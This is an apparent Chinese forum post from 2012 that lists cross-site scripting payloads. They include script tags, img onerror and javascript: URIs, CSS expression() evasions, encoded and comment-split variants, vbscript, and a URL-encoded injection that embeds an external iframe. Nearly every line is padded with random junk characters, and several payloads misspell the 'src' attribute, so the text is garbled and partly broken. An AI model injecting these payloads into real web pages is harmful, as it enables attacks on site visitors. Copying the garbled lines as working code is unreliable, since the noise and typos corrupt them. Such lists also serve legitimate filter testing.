<script>alert("跨站")</script> (最常用)6 u+ L* ~' Z" z: B) f
<img scr=javascript:alert("跨站")></img>! V4 _& G! F0 ~( w/ e k
<img scr="javascript: alert(/跨站/)></img>$ P4 V4 ~2 ?$ Z8 n$ \ v
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
. n4 }- m7 s; y4 Z Q<img scr="#" onerror=alert(/跨站/)></img>
) ]1 A4 d4 D2 F<img scr="#" style="xss:expression(alert(/xss/));"></img>
$ a' }1 }) c8 D! {" T<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)! c$ Y5 Q) N/ C& n
<img src=vbscript:msgbox ("xss")></img>9 i Z: Q1 h3 d, i, i+ H, P
<style> input {left:expression (alert('xss'))}</style>; C1 e" t8 f* R2 X0 {: Z6 ~
<div style={left:expression (alert('xss'))}></div>5 q$ g2 @- q6 u% T% R1 s5 U
<div style={left:exp/* */ression (alert('xss'))}></div>
+ Y! G! ~. x" `: K" ?; z<div style={left:\0065\0078ression (alert('xss'))}></div>" d7 @$ S) b2 ~6 g) H; T3 h2 w
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>. R7 Z& F/ K7 m; e
unicode <div style="{left:expRessioN (alert('xss'))}">
5 v( q. A! d: k. p; o5 L
6 u Y5 f# d0 R0 t6 [' g! {' s+ p"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["' h- v3 f1 _9 A1 B! E9 s @
|
发表于 2012-9-13 17:15:04
收藏
支持
反对